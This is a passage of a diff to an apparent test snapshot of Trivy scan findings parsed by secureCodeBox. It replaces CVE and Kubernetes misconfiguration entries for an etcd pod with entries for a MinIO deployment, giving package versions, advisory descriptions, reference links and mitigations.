"https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/442235", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56152", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2835", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://access.redhat.com/security/cve/CVE-2022-2835", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "https://www.cve.org/CVERecord?id=CVE-2022-2835", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "coreDNS: DNS Redirection of Internal Services", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2022-2835", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2022-2835", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2837", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-2837", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "https://www.cve.org/CVERecord?id=CVE-2022-2837", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "DNS Redirection of Top-Level Domains", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-2837", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://access.redhat.com/security/cve/CVE-2022-2837", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.2.26", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "GHSA-rm8v-mxj3-5rmq", + "installedVersion": "v1.2.19", + "packageName": "github.com/lestrrat-go/jwx", + "references": [ + "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + ], + }, + "category": "Vulnerability", + "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.28.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-33955", + "installedVersion": "v0.20.0", + "packageName": "github.com/minio/console", + "references": [ + "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "https://github.com/minio/console/releases/tag/v0.28.0", + "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + ], + }, + "category": "Vulnerability", + "description": +"Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2023-33955", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://github.com/minio/console/releases/tag/v0.28.0", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/errata/RHSA-2023:2357", @@ -74132,7 +75369,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "handle server errors after sending GOAWAY", "references": [ @@ -74347,15 +75584,79 @@ commonly used by applications.", ], "severity": "HIGH", }, + { + "attributes": { + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", + ], + }, + "category": "Vulnerability", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "request smuggling", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + }, + { + "type": "URL", + "value": "https://go.dev/cl/447396", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56352", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + }, + ], + "severity": "HIGH", + }, { "attributes": { "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", "https://go.dev/cl/468135", "https://go.dev/cl/468295", @@ -74373,7 +75674,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "avoid quadratic complexity in HPACK decoding", "references": [ @@ -74385,6 +75686,10 @@ commonly used by applications.", "type": "URL", "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + }, { "type": "URL", "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", @@ -74443,9 +75748,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/errata/RHSA-2023:2367", @@ -74472,7 +75777,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ @@ -74565,1665 +75870,2323 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": 